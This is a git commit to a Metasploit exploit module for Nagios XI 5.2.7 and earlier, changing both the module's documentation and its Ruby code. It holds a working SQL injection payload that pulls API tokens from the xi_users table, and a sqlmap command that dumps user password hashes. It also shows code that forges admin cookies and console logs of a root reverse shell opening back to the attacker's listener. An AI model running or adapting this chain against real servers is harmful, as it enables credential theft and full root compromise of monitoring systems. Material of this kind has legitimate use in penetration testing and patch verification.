more nagios versatility

bug/bundler_fix
h00die 2016-10-10 10:21:49 -04:00
parent 10efafe44e
commit 2ad82ff8e3
2 changed files with 162 additions and 6 deletions

View File

@ -28,8 +28,22 @@ steps on the screen to configure the app.
Configuration is actually not required to exploit the app, but you should do it Configuration is actually not required to exploit the app, but you should do it
anyway. anyway.
## Options
**USERID**
If you wish to exploit a particular UserID, that can be specified here. Default is 1, which is most likely the admin account.
**APITOKEN**
The SQLi included only works for MySQL, which should work in most cases. However, if you experience a different backend, you can enumerate the user
table via sqlmap: ```sqlmap -u "http://<ip>/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
Then you can set the UserID and APITOKEN to skip those phases and move on to exploitation. Default is empty. See example below for more usage.
## Usage ## Usage
### Typical Usage
Just set ```RHOST``` and fire off the module! It's pretty much painless. Just set ```RHOST``` and fire off the module! It's pretty much painless.
```set VERBOSE true``` if you want to see details. ```set VERBOSE true``` if you want to see details.
@ -71,3 +85,132 @@ uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
uname -a uname -a
Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
``` ```
### Emulating a different DB
#### First we'll attempt the exploit and see what happens.
```
msf exploit(nagios_xi_chained_rce) > show options
Module options (exploit/linux/http/nagios_xi_chained_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
APITOKEN no If an API Token was already stolen, skip the sqli
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.2.218 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
USERID 1 yes User ID in the database to target
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.117 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nagios XI <= 5.2.7
msf exploit(nagios_xi_chained_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Nagios XI version: 5.2.7
[*] Getting API token
[+] 0 incidents resolved in Nagios IM
[-] Exploit aborted due to failure: unexpected-reply: API token not found! punt!
[*] Exploit completed, but no session was created.
```
#### Now lets try using sqlmap to enumerate the user table.
```
root@k:~# sqlmap -u "http://192.168.2.218/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump
...snip...
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
| user_id | name | email | enabled | username | password | backend_ticket |
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
| 2 | admin2 | admin2@admin2.com | 1 | admin2 | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
...sip...
```
#### Re-target
Now, we can set the UserID and APIToken (backend_ticket)
```msf exploit(nagios_xi_chained_rce) > set userid 2
userid => 2
msf exploit(nagios_xi_chained_rce) > set apitoken 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
apitoken => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
msf exploit(nagios_xi_chained_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Nagios XI version: 5.2.7
[*] Getting admin cookie
[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d
[+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
[+] CSRF token: c53d1f591264a3ea771639a7782627f8
[*] Getting monitored host
[+] Monitored host: localhost
[*] Downloading component
[*] Uploading root shell
[*] Popping shell!
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.218:51032) at 2016-10-10 10:15:08 -0400
[*] Cleaning up...
[*] rm -rf ../profile
[*] unzip -qd .. ../../../../tmp/component-profile.zip
[*] chown -R nagios:nagios ../profile
[*] rm -f ../../../../tmp/component-ZEaGkiTW.zip
1138255764
NXEqynCVIfLzvpjUkqOovFvuLgsUrtpo
CKorOSWlTQEkRoiwCiBqTgylyLQjuWxU
oIGZxLofAStLsgsMNaGnQzzMuBYpJUQs
fkUlWzVvhurgAATtxKhLSBFCxQaZqjtR
QajRDDToeigHGMFdUbaClxkLfJbxqBKv
whoami
root
```
#### No APIToken
Or if the backend is MySQL but we want to target a different user, we can simply just set the userid with no APIToken.
```
msf exploit(nagios_xi_chained_rce) > set apitoken ''
apitoken =>
msf exploit(nagios_xi_chained_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Nagios XI version: 5.2.7
[*] Getting API token
[+] API token: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
[*] Getting admin cookie
[+] 2-zIajIKUA-e1b4545976adf651e80a15c92200624d
[+] Admin cookie: nagiosxi=kjeqq7f074pgn61q8l27togtr3;
[+] CSRF token: 05ab9c5c27d99e7c13821a3b43d0f5a6
[*] Getting monitored host
[+] Monitored host: localhost
[*] Downloading component
[*] Uploading root shell
[*] Popping shell!
[*] Command shell session 3 opened (192.168.2.117:4444 -> 192.168.2.218:51054) at 2016-10-10 10:17:12 -0400
[*] Cleaning up...
[*] rm -rf ../profile
[*] unzip -qd .. ../../../../tmp/component-profile.zip
[*] chown -R nagios:nagios ../profile
[*] rm -f ../../../../tmp/component-xrnIbKdJ.zip
```

View File

@ -44,6 +44,10 @@ class MetasploitModule < Msf::Exploit::Remote
'LHOST' => Rex::Socket.source_address 'LHOST' => Rex::Socket.source_address
} }
)) ))
register_options([
OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]),
OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ])
], self.class)
end end
def check def check
@ -69,8 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!') fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
end end
unless datastore['APITOKEN'].empty?
@api_token = datastore['APITOKEN']
else
print_status('Getting API token') print_status('Getting API token')
get_api_token get_api_token
end
print_status('Getting admin cookie') print_status('Getting admin cookie')
get_admin_cookie get_admin_cookie
print_status('Getting monitored host') print_status('Getting monitored host')
@ -117,13 +125,17 @@ class MetasploitModule < Msf::Exploit::Remote
'vars_get' => { 'vars_get' => {
'mode' => 'resolve', 'mode' => 'resolve',
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \ 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \ "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \
'),FLOOR(RAND(0)*2))x ' \ '),FLOOR(RAND(0)*2))x ' \
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ' 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
} }
) )
if res && res.body =~ /Duplicate entry '(.*?).'/ if res && res.body =~ /Duplicate entry '(.*?).'/
if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
# any other user has a longer token, but we cant strip the last char off.
# example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
res.body =~ /Duplicate entry '(.*?)'/
end
@api_token = $1 @api_token = $1
vprint_good("API token: #{@api_token}") vprint_good("API token: #{@api_token}")
else else
@ -136,11 +148,12 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET', 'method' => 'GET',
'uri' => '/nagiosxi/rr.php', 'uri' => '/nagiosxi/rr.php',
'vars_get' => { 'vars_get' => {
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" + 'uid' => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token) Digest::MD5.hexdigest(@api_token)
} }
) )
vprint_good("#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token))
if res && (@admin_cookie = res.get_cookies.split('; ').last) if res && (@admin_cookie = res.get_cookies.split('; ').last)
vprint_good("Admin cookie: #{@admin_cookie}") vprint_good("Admin cookie: #{@admin_cookie}")
get_csrf_token(res.body) get_csrf_token(res.body)